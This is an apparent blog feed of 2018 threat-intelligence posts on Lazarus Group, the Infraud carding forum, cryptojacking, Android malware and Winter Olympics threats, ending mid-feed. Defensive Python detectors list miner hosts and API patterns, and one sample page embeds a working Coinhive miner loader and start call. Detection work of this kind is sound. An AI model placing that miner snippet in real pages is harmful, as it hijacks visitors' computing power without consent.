    Most organizations have key employees who are high-value targets for attackers and most organizations have externally facing systems, in particular Web applications. These assets are a good place to start. By understanding how attackers operate, we can establish some priorities about which actions as defenders we should take based upon the assets that we have and our knowledge of how attackers operate. As our capability matures, our assets can become more specific and nuanced and our understanding of attacker tradecraft similarly develops. Robust fundamentals, however, never go out of style!


    To get the latest threat intelligence news and research, subscribe to our email list here.

    Shadow Talk Update – 02.19.2018 Mon, 19 Feb 2018 21:42:21 +0000 In this week’s Shadow Talk podcast, the Digital Shadows Research Team analyses new activity from the Lazarus Group, attacks on the Winter Games opening ceremony, the theft of $170 million from the Bitgrail cryptocurrency exchange, and two Outlook vulnerabilities.


    Lazarus Group continues to pursue theft and espionage 

    New Lazarus Group activity reported this week shows that the threat group remains highly active and motivated by financial and information theft, as well as espionage. The group was attributed with the financially motivated HaoBao campaign, targeting Bitcoin users, and the development of two trojan variants, “HardRain” and “BadCall”. The targeting of cryptocurrency marks a relatively recent evolution in Lazarus Group’s tactics, techniques and procedures (TTPs). The trojan malware indicates the group’s sustained interest in espionage tools. Digital Shadows expects the group to continue to target cryptocurrency trading platforms within the next one to six months.


    Winter Olympics ‘targeted with Olympic Destroyer’ malware 

    Cyber security researchers have identified a sample of what they assess to be the malware used during the opening ceremony of the 2018 Olympic Winter Games. The attack knocked out Wi-Fi in the stadium and press center. Despite its limited effects, the malware appears technically complex and uses varied techniques, including credentials hardcoded into the malware itself to allow lateral movement between systems. Competing and conflicting reports have linked the campaign to North Korea, China and/or Russia, but there has been insufficient evidence to definitively implicate any threat actor.


    BitGrail reports USD 170 million cryptocurrency loss

    The BitGrail cryptocurrency exchange suffered an attack in which 17 million Nano Tokens (USD 170 million) were allegedly lost. Prior to the disclosure of the attack, BitGrail suspended all withdrawals and deposits of several cryptocurrencies and announced new security measures. Subsequently, a series of heated disagreements have sprung up between the creators of Nano Token and the BitGrail exchange, with neither accepting responsibility for the loss, and both accusing the other of suspicious behavior. Such disagreements will likely prevent customers from reclaiming the value of their tokens. The fallout from the attack will likely strengthen the call to regulate cryptocurrencies and their methods of exchange.


    RCE vulnerability affects MS Outlook

    Microsoft (MS) has released descriptions of two vulnerabilities affecting its Outlook software. One is CVE-2018-0852, a memory corruption vulnerability allowing remote code execution (RCE) if a user opens a crafted malicious file. The second is CVE-2018-0850, a privilege escalation vulnerability. Although neither has been detected being exploited in the wild, both affect multiple versions of MS Outlook; given its ubiquity, it is likely that criminals will seek to exploit them.

    Listen to the full podcast here:

    Subscribe to our weekly newsletter to get the latest podcast and other research by Digital Shadows.

    Infraud Forum Indictment and Arrests: What it Means Thu, 15 Feb 2018 17:44:48 +0000 On 07 February 2018, the U.S. Department of Justice unveiled an indictment from 31 October 2017 against 36 individuals associated with the Infraud Forum, a cybercriminal forum specializing in payment card fraud. This was the result of an operation known as “Shadow Web”, described by the Department as “one of the largest cyberfraud enterprise prosecutions ever undertaken by the Department of Justice.” The members of the forum are alleged to have caused over $500 million in actual losses.

    In the context of last year’s seizure of AlphaBay and Hansa dark web marketplaces, what does this mean for the evolution of the criminal ecosystem, and what is the potential impact on organizations?

    Figure 1: A screenshot of infraud[.]wf, one of the latest editions of the Infraud Forum. Screenshot taken on 7 February 2018.


    Humble beginnings

    The Infraud forum has been through many incarnations, and there are several domains still carrying the Infraud name. The term “infraud”, however, first appeared on a WordPress blog known as the “infraud underground carders blog”. The earliest post on this site is dated 31 October 2010. These initial posts mainly provided advice on carding and ATM fraud, as well as reposts of news articles on criminal and fraudulent activity.

    The first reference on this blog to a dedicated Infraud site appeared on 11 November 2010, when a post was added offering downloads of a ZeuS crimeware toolkit. The post contained a link to a thread on infraud[.]ws.

    On 24 November 2010, a new post was added to the site claiming that the name of the group behind the blog had changed to “Ministry of Fraudulently Affairs”.


    Figure 2: Screenshot of Infraud underground carders blog


    A post added on 07 December 2010 claimed that the infraud[.]ws domain had been blocked after being reported for hosting malware and fraudulent content. The next day, the Infraud domain changed from infraud[.]ws to infraud[.]su.

    As of 03 March 2011, the blog advised users to only visit hxxps://infraud[.]cc.


    Figure 3: Post made on Infraud blog advising users to visit infraud[.]cc, a domain registered on 30 November 2010


    The name Ministry of Fraudulently Affairs also appears on a separate LiveJournal blog site (hxxp://infraud.livejournal[.]com) where advertisements and links to the infraud[.]cc site were posted.

    The “Infraud Journal” user profile for this blog site contained a link to the infraud[.]cc website and a Twitter account that is now suspended. The user stated their location as Borispol, Ukraine and used the Buddhist symbol Om as a logo. The account was created on 30 October 2010 and was last updated on 05 August 2014.


    Figure 4: infraud profile on Infraud Journal blog


    Online profiles using the “infraud” naming started appearing frequently across several criminal forums in December 2010 and January 2011. Many of these profiles used details and indicators previously used on the WordPress and Infraud Journal blogs, including the names “infraud” or “Ministry of Fraudulently Affairs”, and the Om Buddhist symbol as a profile picture. In this example from 26 January 2011 (below), the user infraud advertised an IP address and domains associated with the Infraud operation.


    Figure 5: Post made to hpc[.]name forum by user “infraud” containing links to various infraud domains


    How it worked

    Between 2010 and 2018, the Infraud Forum switched to several different top level domains and attracted large numbers of members to the forum (Brian Krebs puts this number at almost 11,000).

    The reputation of the forum also grew; a vendor with a presence on Infraud gained added legitimacy. Even some of the most reputable Automated Vending Carts (AVCs), such as the popular site Joker’s Stash, sought a presence on the Infraud Forum (see below). While Infraud was not unique in this respect (Verified, Omerta, and Exploit are other examples of forums where vendors look to establish a reputation), it was certainly a significant player.


    Figure 6: Post by JokerStash on wtl[.]pw


    In order to facilitate these vendors, the forum had a specific section for vendors to advertise. Vendors like Unnicat, Dark4sys, and Deputat (all also named in the indictment) had a presence here.

    The site extended beyond being simply a collection of credit card vendors, with separate exchanger and escrow services also available. Users could access these services at different access levels, such as VIP.


    Figure 7: A screenshot of Infraud[.]cc



    The Infraud Forum is another example of the level of professionalization that exists within the criminal underground. This forum was clearly highly hierarchical and relied on its extensive networks and reputation to make a lot of money.

    Many of the aliases disclosed in the indictment were at one point active across a host of different underground forums, including the AlphaBay forum. Although the full details of the law enforcement operation have not yet been released, it’s possible that the seizure of AlphaBay in 2017 provided valuable intelligence in this operation. Nevertheless, news that 36 prominent cybercriminals – who were active across several sites – have been closely monitored by international authorities will act as a further blow for the criminal community, which is still dealing with the impact of the AlphaBay and Hansa seizures.

    The impact of this announcement should be placed into context. It’s worth noting that of the 36 individuals named in the indictment, only 13 have been apprehended. Indeed, although the site infraud[.]wf appears to have been seized, some sites that were run by vendors on the Infraud Forum remain active such as d4rksys[.]cc (see Figure 8 below), a site allegedly run by dark3r. This is similarly the case for sites run by Unnicat and Debutat. This is a reminder that, although Infraud was a significant player, there are many more forums and AVCs in operation, and the closure of one site will mean criminal actors will migrate to other forums.


    Figure 8: A screenshot of d4rksys[.]cc, taken on 07 February 2018.

    Shifts within the criminal ecosystem

    Given the increased attention from law enforcement, it’s possible we will see more forums turning to new technologies to reduce the likelihood of domain seizure. Joker’s Stash has already moved its site hosting to a blockchain-based domain name system (DNS) provided by the cryptocurrency Emercoin. We’ve seen adverts demonstrating this change since around the end of September 2017, on multiple clear web carding forums.


    Figure 9: Joker’s Stash advert on carding forum with link and instructions to latest Blockchain DNS site


    The adverts direct users to a “Blockchain DNS” browser extension for Chrome and Firefox, which enables its users to connect to top level domains (TLDs) such as .bazar, .coin, .lib, .emc and others. These TLDs are not delegated in the public DNS root, so a standard browser configuration cannot resolve them. As Emercoin’s domain name records are completely decentralized, they cannot be altered, revoked or suspended by any authority; only a record’s owner can modify it or transfer it to another owner. The owners of Joker’s Stash therefore likely sought to avoid takedowns or other external disruption by moving to a blockchain solution.

    This is not the first example of threat actors using blockchain-based DNS. The operators of both the Necurs botnet and the point of sale (PoS) malware Kasidet have used the Namecoin peer-to-peer network, which has no central authority, likely in attempts to avoid law enforcement takedowns of their command and control (C2) infrastructure. For the owners of Joker’s Stash, Emercoin’s DNS might trump traditional DNS for the same reasons, but it still requires visitors to take additional steps to reach the site, and that might drive away some of its business. In the end, as with a lot of security, the benefits may come at the sacrifice of ease-of-use.
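    The move to blockchain TLDs is also a detection opportunity for defenders. The script below is an added example written for this post (it is not Digital Shadows code, nor anything from the sites discussed): it parses resolver query logs and reports, per client, any lookups for names under the Emercoin TLDs named above (.bazar, .coin, .lib, .emc) or Namecoin’s .bit. The log format and the sample lines are constructed for the example, and the names in them are placeholders; map the regex onto your own resolver’s format. One caveat: depending on how the browser extension resolves these names, the queries may never reach your internal resolver, so pair this with a search of web proxy logs for the same TLDs.

```python
import re
from collections import defaultdict

# Blockchain-DNS top-level domains: Emercoin's .bazar/.coin/.lib/.emc (named above)
# plus Namecoin's .bit. Extend the set with anything else you see advertised.
BLOCKCHAIN_TLDS = {"bazar", "coin", "lib", "emc", "bit"}

# Constructed log format for this example: "<timestamp> <client_ip> <qname> <qtype> <rcode>".
# Adjust the regex to your resolver's real log format.
LOG_RE = re.compile(
    r"^(?P<ts>\S+)\s+(?P<client>\S+)\s+(?P<qname>\S+)\s+(?P<qtype>\S+)\s+(?P<rcode>\S+)$"
)


def parse_line(line):
    """Return a dict of fields for a well-formed log line, or None for anything else."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    rec = m.groupdict()
    rec["qname"] = rec["qname"].rstrip(".").lower()  # drop trailing root dot, normalise case
    return rec


def tld_of(qname):
    """Last label of a query name ('shop.bazar' -> 'bazar'); '' if there is no dot."""
    return qname.rsplit(".", 1)[-1] if "." in qname else ""


def find_blockchain_dns(lines):
    """Map client IP -> list of queried names whose TLD is a blockchain-DNS TLD.

    Such names are not delegated in the public DNS root, so a resolver answers NXDOMAIN;
    a client repeatedly asking for them is the signal, not the answer it gets.
    """
    hits = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue  # malformed line, skip rather than crash the sweep
        if tld_of(rec["qname"]) in BLOCKCHAIN_TLDS:
            hits[rec["client"]].append(rec["qname"])
    return dict(hits)


# Constructed sample log for this example; the names are placeholders, not real sites.
SAMPLE_LOG = """\
2018-02-15T10:01:02Z 10.0.0.5 www.example.com. A NOERROR
2018-02-15T10:01:07Z 10.0.0.5 shop.bazar. A NXDOMAIN
2018-02-15T10:01:09Z 10.0.0.9 update.example.net. AAAA NOERROR
2018-02-15T10:02:11Z 10.0.0.5 files.bit. A NXDOMAIN
2018-02-15T10:03:00Z 10.0.0.7 library.coin. A NXDOMAIN
this line is malformed and is skipped
""".splitlines()

if __name__ == "__main__":
    for client, names in find_blockchain_dns(SAMPLE_LOG).items():
        print(f"{client}: {', '.join(names)}")
```

    Run against the sample, the sweep reports 10.0.0.5 asking for two such names and 10.0.0.7 for one; in production, a client generating repeated NXDOMAINs for these TLDs is worth a look at what is installed in its browser.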


    No significant change anticipated

    Unfortunately, the reality is that this latest piece of news constitutes no real decrease in the threat posed to merchants, consumers and financial institutions from card fraud. Nevertheless, we will be keeping tabs on any changes that occur from these latest arrests, as the cybercriminal community bounces back from another setback. To find out more about the underground carding ecosystem, download a copy of our previous research report, Inside Online Carding Courses Designed for Cybercriminals.


    To get the latest threat intelligence news and research, subscribe to our email list here.

    Cryptojacking: An Overview Tue, 13 Feb 2018 17:59:17 +0000 What is Cryptojacking?

    Cryptojacking is the hijacking of someone else’s browser to mine cryptocurrencies with their computer’s processing power. There are several pieces of software available that do this, including Coinhive, Authedmine and Crypto-Loot. While such tools are not necessarily illegal, their stealth and the lack of user consent have led many to view cryptojacking software as malware; the security firm Malwarebytes, for example, has blocked coinhive[.]com.

    This week it was announced that a number of government websites, including the NHS, had been serving cryptojacking malware, meaning that visitors had been unknowingly mining cryptocurrency.


    Monero mining is big business; browsers, extensions and mobile apps have all reportedly spread Coinhive in the past few months. Coinhive is a JavaScript miner for Monero, a cryptocurrency that has been steadily growing in popularity since 2014. In January 2018, a proof of concept called CoffeeMiner was released, which shows how an attacker on a shared public Wi-Fi network can inject a browser miner into other users’ unencrypted web traffic and mine cryptocurrency with their devices.

    More recently, a malvertising campaign targeted Google’s DoubleClick advertising tool to compromise adverts and distribute Coinhive. The sharp increase in use of Coinhive miners correlated to an increase in traffic to five malicious domains, which was subsequently linked back to DoubleClick advertisements.

    Crypto Jacker: A New WordPress Plugin

    A new product called Crypto Jacker looks to combine Coinhive, Authedmine and Crypto-Loot into a WordPress plugin with added Search Engine Optimization (SEO) functionality. The domain cryptojacker[.]co was registered on November 30th, 2017 and sells a one-time licence for the Crypto Jacker software for $29. Once purchased, users can install Crypto Jacker on an unlimited number of their own domains.


    Figure 1: The Crypto Jacker software


    Crypto Jacker “provides a way to earn crypto currency from people who visit your links, even when you’re sharing other websites that you don’t own. We even cloak your website links for your (sic.) so they look like the original shares on social media.” This is done by using an iframe to clone content from popular websites, as shown in Figure 2.

    Figure 2: The user interface of the Crypto Jacker plug-in

    There are a couple of things Crypto Jacker does to increase traffic to the site.

    1. Users can load the metadata from the destination URL, making the cloned page feature more highly in search engine rankings.
    2. “Social Cloaking” (as shown in Figure 3) makes the imitation link appear to come from the original destination, increasing the likelihood of clicks.

    Figure 3: Crypto Jacker’s “social cloaking” demonstration video

    It’s unsurprising that Crypto Jacker has these SEO features, given that other pieces of software published under the name Thomas Witek (the author of Crypto Jacker) include “Click Jacker”, “Link Cloaker”, and “Gram Poster”. The shift in business model from advertising to cryptocurrency mining is explicitly referenced on the website: “advertising on the web is difficult to profit from….why shouldn’t you mine crypto coins.” This is part of a broader shift towards cryptocurrency fraud by a variety of actors, which we analyse in more detail in our recent research report, The New Gold Rush: Cryptocurrencies are the New Frontier of Fraud.

    Scam or Legitimate?

    Is this a scam? It’s possible that Crypto Jacker is a ruse to cash in on web developers’ interest in cryptocurrency mining. This review questions the nature of the site itself.

    Our own tests of the demo website (paidallday[.]com/what-you-need-to-know-about-bitcoin), shown on the Crypto Jacker website, indicate that cryptocurrency mining is likely taking place. As shown in Figure 4, the website appeared to have the plugin “cj-plugin” installed, which launched the “” script. When we visited the site, CPU usage increased significantly, to 50% (as shown in Figure 5). While this does not confirm that the Crypto Jacker product is legitimate, it does add some credibility to the claim.

    Figure 4: The source code of paidallday[.]com/what-you-need-to-know-about-bitcoin, a demo website shown in Crypto Jacker videos

    Figure 5: CPU usage peaking at the time of the visit to the website
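    A check of the kind described above can be automated. The scanner below is an added example for this post, not code from Digital Shadows or from the Crypto Jacker product: it parses a page’s HTML and flags external scripts loaded from the miner hosts named above (coinhive.com, authedmine.com, crypto-loot.com), inline calls to the miner libraries’ APIs, and iframes that pull in content from a host other than the page’s own, which is how the cloaking described above works. The API identifiers in the regex, the sample page and the host name example.com are assumptions constructed for the example; the CPU check used in the post is a separate, behavioural signal that this static scan complements rather than replaces.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Browser-miner script hosts named in the post. Extend with the NoCoin blocklist or your own.
MINER_HOSTS = {"coinhive.com", "authedmine.com", "crypto-loot.com"}

# Inline API calls the miner libraries expose. These are assumed signatures for this
# example; replace them with the identifiers your own detections are built on.
MINER_API_RE = re.compile(r"CoinHive\.(?:Anonymous|User)|CRLT\.Anonymous", re.I)


def _host_of(url):
    """Hostname of an absolute or protocol-relative URL; '' for relative paths."""
    return (urlparse(url).hostname or "").lower()


def _is_miner_host(host):
    return any(host == h or host.endswith("." + h) for h in MINER_HOSTS)


class MinerScanner(HTMLParser):
    """Collect (kind, evidence) tuples: external miner scripts, inline miner calls,
    and third-party iframes of the sort the 'social cloaking' feature relies on."""

    def __init__(self, page_host):
        super().__init__()
        self.page_host = page_host.lower()
        self.findings = []
        self._script_buf = None  # non-None while inside a <script> element

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "script":
            self._script_buf = []
            src = a.get("src") or ""
            if src and _is_miner_host(_host_of(src)):
                self.findings.append(("miner-script", src))
        elif tag == "iframe":
            src = a.get("src") or ""
            host = _host_of(src)
            if host and host != self.page_host:
                self.findings.append(("third-party-iframe", src))

    def handle_data(self, data):
        # HTMLParser hands <script> bodies to handle_data unparsed; buffer them.
        if self._script_buf is not None:
            self._script_buf.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._script_buf is not None:
            m = MINER_API_RE.search("".join(self._script_buf))
            self._script_buf = None
            if m:
                self.findings.append(("miner-inline", m.group(0)))


def scan_html(html, page_host):
    """Return the list of findings for one page's HTML, in document order."""
    p = MinerScanner(page_host)
    p.feed(html)
    p.close()
    return p.findings


# Constructed sample page for this example, shaped like the cloaked demo site described above.
SAMPLE_PAGE = """<html><head>
<script src="https://coinhive.com/lib/coinhive.min.js"></script>
<script>var miner = new CoinHive.Anonymous('SITE_KEY', {throttle: 0.3}); miner.start();</script>
<script src="/wp-content/plugins/cj-plugin/cj.js"></script>
</head><body>
<iframe src="https://www.example.org/some-article" width="100%" height="100%"></iframe>
</body></html>"""

if __name__ == "__main__":
    for kind, evidence in scan_html(SAMPLE_PAGE, "example.com"):
        print(f"{kind}: {evidence}")
```

    A site that loads a miner from a third-party CDN, or bundles the miner library into its own JavaScript, will only trip the inline check, so keep the API signature list current; a full-page third-party iframe on its own is not proof of mining, but together with a miner script it is the cloaking pattern the product advertises.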

    Interest in cryptocurrencies shows no sign of slowing down and, while Crypto Jacker does not appear to have developed a large user base, its emergence – if legitimate – is an attempt to lower the barrier to entry for those looking to use stealthy cryptocurrency mining software.

    Protect yourself from Crypto mining

    1. Have a reputable ad blocker

    Organizations that do not wish to be “crypto jacked” and inadvertently mine cryptocurrency should ensure they have a reputable ad blocker in place. Consider ad blockers such as AdBlock, AdBlock Plus, 1Blocker, and UBlock. The NoCoin browser extension was also developed to block coin miners such as Coinhive.

    2. Apply patches to known vulnerabilities

    Organizations should apply patches and mitigation to known vulnerabilities as these can be used to deliver crypto miners. In December 2017 PyCryptoMiner, for example, began exploiting a vulnerability affecting JBoss servers that was first discovered in October. More recently, a Struts server exploit has been used for Monero mining. Sites such as the US CERT, the National Vulnerability Database and MITRE can provide the latest information on newly disclosed vulnerabilities. Red Hat Software provided mitigation advice for the JBoss vulnerability exploited by PyCryptoMiner. Patches for the Struts vulnerabilities are also available.


    Download our latest research paper, The New Gold Rush: Cryptocurrencies are the New Frontier of Fraud, to learn more about cryptocurrency fraud and ways to protect against it.


    To get the latest threat intelligence news and research, subscribe to our email list here.

    Shadow Talk Update – 12.02.2018 Mon, 12 Feb 2018 15:23:39 +0000 With the 2018 Winter Games beginning this week, the Digital Shadows Research Team focused on threats to those traveling to South Korea in this episode of Shadow Talk. There was also a roundup of the most recent cyber security news.

    Malware in Winter Olympics spearphishing campaign identified

    Anti-virus security company McAfee published a report detailing four variants of malware linked to the targeting of organizations associated with the XXIII Winter Games in South Korea. The variants were identified as “Gold Dragon”, “Brave Prince”, “Ghost419” and “RunningRat”. During the games themselves, we expect a rise in cybercriminal activity, through point of sale malware infections at hospitality, leisure and retail locations, ATM skimming, banking fraud and scam emails. VIPs travelling to the event are advised to use alternative forms of payment such as chip and PIN, pre-paid and pre-capped cards. Travellers should also use Virtual Private Network (VPN) tunnelling when connecting to company networks and corporate accounts, especially on public Wi-Fi.


    Operation Pzchao: not your typical espionage campaign

    The espionage-driven campaign Operation Pzchao has affected multiple entities across government, technology, education and telecommunications in North America, Russia, Oceania and Asia since 2016. Victims received emails containing a Visual Basic Script (VBScript) file, which retrieved second-stage payloads: a Bitcoin mining application, the credential harvester “Mimikatz”, and variants of the “Gh0st” remote-access trojan (RAT). Digital Shadows analysts cast doubt on the reported attribution to a Chinese state-linked advanced persistent threat (APT) group: the use of a Bitcoin miner, inconsistencies in the reported distribution method and the use of a widespread RAT with no additional custom malware are not typical of a highly coordinated, state-linked group.


    Adobe zero-day vulnerability exploited in attacks against South Koreans

    The South Korean Computer Emergency Response Team (CERT) warned that a critical Adobe vulnerability was exploited in attacks targeting South Koreans involved in geopolitical research. Spearphishing emails were the only known vector of the attacks, which were attributed to a North Korean threat group. The emails distributed a variant of the “ROKRAT” trojan, which has reconnaissance and information-stealing capabilities. Adobe has issued security updates for the vulnerability, identified as CVE-2018-4878. Further exploitation attempts of this flaw are highly likely.


    Denial of service vulnerability discovered in WordPress platform

    A vulnerability identified in the WordPress online publishing platform could enable an attacker to conduct denial of service attacks. The researcher who identified the flaw claimed that requests for large JavaScript or Cascading Style Sheet files could be sent repeatedly to sites, resulting in the denial of legitimate traffic. WordPress has indicated it does not plan to patch the flaw, although exploitation of this vulnerability could potentially reverse this decision. The researcher released proof-of-concept (PoC) code, and secondary reporting suggested a small number of exploitation attempts had been detected. Further attempts are considered highly likely.


    United States authorities charge 36 individuals allegedly behind the ‘Infraud’ cybercrime forum

    On Wednesday 7 February, the U.S. Department of Justice unveiled an indictment from 31 October 2017 against 36 individuals associated with the Infraud carding forum. This was the result of an operation known as “Shadow Web”. Although Infraud was a significant player in the carding ecosystem, there are still many more forums and Automated Vending Carts (AVCs) in operation, and the closure of one site means criminal actors will migrate to other forums. Therefore, the threat posed to organizations by carding fraud remains the same. Our research also indicated that some sites run by vendors on the Infraud Forum are still active.

    Listen to this week’s podcast episode here:

    Subscribe to our weekly newsletter to get the latest podcast and other research by Digital Shadows.

    2017 Android malware in review: 4 key takeaways Thu, 08 Feb 2018 18:25:34 +0000 Android mobile devices were an attractive target for malicious activity throughout 2017. The ubiquity of these devices, and the sensitive data they often hold, enticed both espionage and financially motivated attackers. In 2017, we reported on 48 separate campaigns that targeted mobile applications and vulnerabilities. Our research highlighted the following key takeaways from the past year:

    1. Official app stores are not infallible

    Google Play was the most frequently cited single source of Android malware infections. Despite the security measures in place, the official Google Play store can still be used to distribute malicious applications, and given its popularity, criminal actors will continue to target it as a means of distributing malicious apps.

    However, 66% of reported initial infections were from locations other than the official app store. Google Play’s profile can also slightly skew public reporting of Android malware infections, as security researchers will often focus on identifying security weaknesses on the most well-known platforms ahead of other, third-party sites. The number of infection entry points outside of app stores should remind us to remain vigilant of phishing texts and emails, and to take added precautions when browsing on mobile devices.


    Figure 1 Reported initial infection points for mobile malware since January 1st 2017 (unknown omitted)


    2. Appearances can be deceiving

    Attackers predominantly used two variations of malicious apps to disguise malware and push downloads; apps either a) acted as legitimate resources such as cryptocurrency, security and games services, or b) fraudulently used branding associated with credible organizations, like Chrome or Adobe.

    Once installed, malware used a variety of methods to obtain device or user information, including requesting unnecessary permissions from the user and obtaining device administrator privileges. Where user interaction was required to harvest data, overlays (where a malicious app superimposes its own screen over a legitimate app) were commonly deployed to prompt users to enter personal and financial information.

    These Android malware deployments included both opportunistic campaigns where users inadvertently downloaded malicious apps from a given site, as well as more targeted social engineering campaigns, such as those targeting users based in a particular country or industry.


    Figure 2 Reported techniques, tactics and procedures in Android incidents since January 1st 2017


    3. Espionage and financial gain were the primary motives

    Gathering information, such as profiling device information or recording phone calls and messages, was the most prevalent reason for infection. Collecting financial and banking data came a close second. Mobile banking malware uses sophisticated techniques for harvesting data, including overlays specific to target banks, and intercepting SMS messages to obtain multi-factor authentication codes.

    Given the increase in reports of cryptocurrency mining malware in 2018, which is partly a result of the steep rise in cryptocurrency prices, there is a realistic possibility that more Android malware attacks will incorporate cryptocurrency mining payloads in future.


    Figure 3 Reported function of mobile malware since January 1st 2017

    4. How to avoid infection

    We expect malware campaigns against the Android platform to continue in 2018; nevertheless, enterprises and individuals can take several preventative measures to lower the risk of infection:

    • Use the official Google Play store; only download “Play Protect verified” apps from legitimate companies
    • Only allow limited permissions for downloaded apps
    • For enterprise devices, Mobile Device Management solutions give IT security staff control to set access permissions and restrictions
    • Do not root enterprise devices, as rooting grants unrestricted access to the Android operating system. Preventing rooting mitigates unauthorized administrative privilege access.
    • Deploy end-point Antivirus solutions on individual devices
    • Bring Your Own Device (BYOD) enterprises should establish user policies and disallow connection of BYOD to corporate infrastructure.
    • Educate employees on threats associated with SMS phishing and mobile device browsing

    Subscribe here to get the latest threat intelligence and more from Digital Shadows in your inbox.

    Phishing for Gold: Threats to the 2018 Winter Games Tue, 06 Feb 2018 14:12:22 +0000 Digital Shadows has been monitoring major sporting events since 2014, beginning with the Winter Olympics in Sochi, Russia, and then the 2014 World Cup in Brazil. The 2016 Olympics, held in Rio de Janeiro, were a hotbed of cyber activity, dominated by the OpOlympicHacking campaign, physical protests, and high levels of cybercrime against attendees. Rio showed that cyber actors look to profit from the millions of visitors, the global media audience and the increased number of financial transactions that accompany major sporting events.

    Although hacktivist and physical protest activity often accompany events with international media coverage, we believe cybercrime and fraud will be the most imminent and prevalent threats to the 2018 Olympic event and its attendees. Rio was also significant because it highlighted how actors working with the approval of, or on behalf of, nation-states can use the cover of global sporting events for their own goals. In 2018, regional tensions between North and South Korea may well contribute to nation-state cyber operations, although it is unclear how the recent public overtures between the two states and the decision to invite North Korean athletes to the event will affect this.

    As millions of fans descend on South Korea, particularly business and political VIPs, we believe the event will likely be targeted by a variety of cyber actors. This includes financially motivated cyber-criminals and more capable nation state actors – possibly as a dry-run for campaigns during the larger 2018 World Cup to be hosted later this year in Russia.


    The Games Have Already Begun

    We have already reported on data leaks and phishing attempts targeting organizers and affiliates of the Winter Olympics. As well as this, our SearchLight platform found several potentially malicious domains, social media accounts and infrastructural issues that could be used in future attacks.

    Both in the lead up and during the event, we expect to see:

    • Phishing. As well as targeting volunteers, attackers will use interest in the event as a lure when sending malicious phishing emails. We discovered several typo-squat domains that use the 2018 Winter Olympics and World Anti-Doping Agency (WADA) brand names. These domains were not registered to official entities, and over half were registered in Russia and Ukraine or behind proxy services. Although not currently used in active campaigns, these domains could be used in phishing attacks to distribute malware or harvest credentials.

    Selection of typo-squat domains discovered by Digital Shadows


    • Exposed credentials. We searched for examples of exposed credentials belonging to Olympic and WADA accounts in our repository of third party breaches. Here we found at least 300 examples of Olympic or WADA credential pairs in multiple breached datasets that became public in the last 12 months. These credentials could be used for further cyber-attacks against Olympic organizations, including spear-phishing and account takeover.


    Selection of exposed credentials for Olympic and WADA domains in breaches found by Digital Shadows

    • Data Leaks. In January, the Fancy Bears group – a self-proclaimed hacktivist group believed to be affiliated with the Russian state – published emails from the International Olympic Committee and International Luge Federation, likely in retaliation for the banning of Russian athletes over alleged doping. On January 31, they published further information implicating Canadian athletes. “Fancy Bears” is a play on the widely used name “Fancy Bear” (APT-28), which refers to an espionage group that the US intelligence community has linked to the Russian intelligence services. It is still unclear whether the two groups are one and the same; nevertheless, data leaks against WADA and the International Olympic Committee have been conducted under the Fancy Bear name since Rio in 2016.

    Fancy Bears announce leak of documents belonging to Canadian athletes via Twitter

    • Malware attacks. 2018 Olympic volunteers were targeted by macro-malware through email attachments imitating genuine documentation from the official 2018 Winter Olympics website. The original contained logistics details for the volunteers, suggesting the malware was aimed at either the volunteers themselves, or the volunteer portal. More recently, a data-gathering malware known as GoldDragon was identified targeting organizations associated with the 2018 Winter Olympics. In this case, the payloads were designed to establish persistence on targeted machines and enable further data exfiltration, as well as provide an ability to download additional malware.
    • Attacks on Wi-Fi network users. Attackers have previously compromised public Wi-Fi networks when going after high-value targets. The campaign known as DarkHotel, for example, used spoofed software updates on infected Wi-Fi networks targeting hotels in Asia, while APT-28 used credentials likely stolen from Wi-Fi networks in hotels to deploy remote access malware that could steal information and allow for lateral movement across networks.
    • Financial cybercrime. Criminals will often try to exploit the large number of visitors and the increase in financial transactions, particularly in areas of high tourist density such as city centers, hotels, restaurants and shopping areas. For example, between March and July 2017, over 41 Hyatt Hotel locations in 11 countries were compromised, resulting in the compromise of customer payment card details. 18 of the affected hotels were in China, but branches in South Korea, Japan, North and South America were also impacted. As well as an increase in payment card theft through point of sale malware infections at hospitality, leisure and retail locations, expect a rise in ATM skimming, banking fraud and scam emails.


    Visualizing the Threat

    Below is a visualized form of the expected threat landscape of the upcoming event. It breaks down potential targets for the Winter Olympics and presents some of the most likely risks for each.



    Podium Finish

    The 2018 Winter Olympics is expected to be a focal point of criminal and politically-charged cyber activity, as seen in previous similar events. The following mitigation techniques can help limit the impact of the malicious activity that will likely occur:

    • Update and patch. First and foremost, organizations should make sure their firmware and OS systems are updated with the latest patches, especially Microsoft applications.
    • Be wary of scams and phishing emails. Do not click on any links in emails marketing or referencing the event. The IOC will not be launching an email marketing campaign with “FREE TICKETS!!1!” and any claimed scandals pertaining to athletes can be found on trusted news media sites, not in any “YOU WON’T BELIEVE HOW THIS ATHELETE WON 20 GOLD MEDALS, CLICK HERE TO FIND OUT” emails.
    • When downloading applications, make sure you only initiate these from legitimate sites such as the Apple and Google stores. Also ensure you review security and access permissions granted to these programs. In November 2017 it was discovered that Android malware previously used by the Lazarus Group – an actor affiliated to the North Korean state – had been used to target the general public in South Korea.
    • Be vigilant when using ATMs in-country. Look out for evidence of machine tampering: some skimming devices can be spotted by a quick wiggle of the card reader or through visible marks on the PIN pad area. To help lessen the impact of Point of Sale malware and ATM skimming, alternative forms of payment like chip and PIN, pre-paid and pre-capped cards should be considered.
    • Avoid untrusted networks. Corporate users should use Virtual Private Network (VPN) tunnelling when connecting to company networks and corporate accounts, especially on public Wi-Fi. Multi-factor authentication can also help prevent successful account compromises.
    • Protect VIPs. High-value employees traveling to the event should consider having their technology and devices placed in isolated corporate networks preceding and during the event. Following the event, a quarantine period could also be established to ensure nothing malicious has been brought back into the corporate network.


    Shadow Talk Update – 02.05.2018
    Mon, 05 Feb 2018 15:26:46 +0000

    In this week’s podcast episode of Shadow Talk, the Digital Shadows Research Team covered a range of activity. Here’s a quick roundup.


    In-development malware samples observed targeting Spectre and Meltdown

    Researchers reportedly detected malware samples designed to exploit the Spectre and Meltdown vulnerabilities. The samples appeared to be in development and were not actively exploiting the flaws. Though these samples may have been designed for exploitation purposes, there were still no detected samples accomplishing this activity. It is likely that Spectre and Meltdown exploits will continue to be developed into the near future.


    Japanese cryptocurrency stolen in huge cyber-heist

